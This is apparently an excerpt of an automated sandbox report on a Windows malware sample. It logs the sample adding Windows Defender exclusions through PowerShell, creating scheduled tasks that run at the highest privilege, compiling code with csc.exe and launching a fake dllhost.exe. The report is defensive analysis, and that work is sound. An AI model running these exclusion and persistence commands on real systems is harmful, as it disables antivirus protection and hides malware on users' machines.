Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe'
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\PrintHood\hxpWOXgnBGVLArPcwqxpuA.exe'
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe'
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe'
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\dllhost.exe'
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4Awb1u1GcJ.exe'
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\PrintHood\hxpWOXgnBGVLArPcwqxpuA.exe'	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe'	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\dllhost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4Awb1u1GcJ.exe'	Jump to behavior

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hxpWOXgnBGVLArPcwqxpuAh" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\PrintHood\hxpWOXgnBGVLArPcwqxpuA.exe'	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hxpWOXgnBGVLArPcwqxpuAh" /sc MINUTE /mo 13 /tr "'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe'	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\dllhost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4Awb1u1GcJ.exe'	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RM8EX6c6Td.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1D7.tmp" "c:\Windows\System32\CSC3F9C54C7EA774D8CB8E83128B6DCF481.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe "C:\Users\user\NetHood\dllhost.exe"

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Queries volume information: C:\Users\user\Desktop\4Awb1u1GcJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
